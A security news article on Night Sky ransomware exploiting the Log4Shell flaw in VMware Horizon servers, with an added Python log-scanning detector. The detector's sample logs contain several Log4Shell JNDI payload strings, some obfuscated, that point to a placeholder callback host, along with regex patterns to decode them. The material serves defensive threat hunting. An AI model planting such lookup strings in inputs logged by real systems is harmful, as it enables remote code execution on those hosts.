New ransomware exploits the Log4j vulnerability to encrypt VMware Horizon servers

A ransomware operation tracked as Night Sky has been compromising VMware Horizon deployments by exploiting the critical Log4j vulnerability CVE-2021-44228 (Log4Shell). Internet-exposed Horizon servers are the entry point; according to Microsoft, the attackers' command-and-control infrastructure uses domains that impersonate cybersecurity and technology companies.

Night Sky was first observed in late 2021 and appears to focus on enterprise networks. The number of victims worldwide is not yet known; in at least one reported case the operators demanded a ransom of $800,000 USD.

This week, Microsoft also reported a campaign exploiting the flaw to compromise VMware Horizon, the platform VMware uses to deliver virtual desktops and applications.

While VMware has patched the Log4j flaw in Horizon and published workarounds for customers who cannot install the fixed version, thousands of unpatched deployments remain exposed, and Microsoft confirms they are being used to deliver ransomware: “Our research shows that successful intrusions stemming from this attack led to the deployment of NightSky ransomware,” Microsoft points out.

The same operator has previously been observed distributing other ransomware families, including LockFile, AtomSilo, and Rook. In those incidents the attackers exploited CVE-2021-26084 in Atlassian Confluence and CVE-2021-34473 in on-premises Microsoft Exchange.

Security researchers note that Log4Shell is a highly attractive attack vector because the Log4j library is embedded in a vast range of Java applications and appliances. Exploitation requires minimal effort: the attacker only has to get a crafted lookup string into any value the application logs, and success gives remote code execution on the host, enabling a wide range of follow-on attacks.

The flaw can be exploited remotely against vulnerable deployments exposed to the Internet, or from inside a network, allowing an attacker who already has a foothold to move laterally to sensitive internal systems.
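Because the exploit is just a string in a logged field, the practical defensive check for the vector described above is to search web-server and application logs for JNDI lookups, including the URL-encoded and nested-lookup obfuscations attackers use to evade naive `${jndi:` grep patterns. The following detector is an added example written for this page, not code from the article, from Microsoft, or from VMware; the log lines it scans are constructed for the example, and the IP addresses and host names in them are placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (Apache combined-style); not taken from any real incident.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%3A1389%2Fa%7D HTTP/1.1" 400 "-"',
    '10.0.0.12 - - "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:${lower:l}dap://203.0.113.10/a}"',
    '10.0.0.12 - - "GET / HTTP/1.1" 200 "${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap://203.0.113.10/a}"',
    '10.0.0.13 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.10:1099/a}"',
    '10.0.0.20 - - "GET /search?q=${date:yyyy} HTTP/1.1" 200 "-"',
    '10.0.0.21 - - "GET /docs/jndi-tutorial HTTP/1.1" 200 "-"',
]

# Only innermost lookups (no further braces inside) are matched, so nested
# obfuscation is resolved from the inside out, the way Log4j itself evaluates it.
_CASE = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
# Any lookup with a ":-default" fallback (env, sys, main, or the bare "${::-x}" form)
# evaluates to its default when the key is unset, which is what attackers rely on.
_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# Log4j lowercases lookup prefixes before dispatch, so the match is case-insensitive.
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 20) -> str:
    """Undo (possibly repeated) URL-encoding, then resolve Log4j obfuscation lookups."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        resolved = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        resolved = _DEFAULT.sub(lambda m: m.group(1), resolved)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi(lines):
    """Return one finding per JNDI lookup: line index, URI scheme and the de-obfuscated payload."""
    findings = []
    for index, line in enumerate(lines):
        norm = normalize(line)
        for m in _JNDI.finditer(norm):
            end = norm.find("}", m.start())
            payload = norm[m.start():end + 1] if end != -1 else norm[m.start():]
            findings.append({"line": index, "scheme": m.group(1).lower(), "payload": payload})
    return findings


if __name__ == "__main__":
    for f in find_jndi(SAMPLE_LOGS):
        print(f"line {f['line']}: {f['scheme']} -> {f['payload']}")
```

Run against the sample, the detector flags lines 1 to 5 and leaves the benign `${date:yyyy}` lookup and the literal path `/docs/jndi-tutorial` alone. The de-obfuscated payload also exposes the callback host and port, which is what you pivot on when hunting for the same infrastructure elsewhere in the estate.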

Conti was among the first ransomware operations to exploit the flaw, launching large-scale attacks within days of the publication of a proof of concept (PoC). The Khonsari ransomware was also deployed through Log4j attacks using an exploit published on GitHub.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.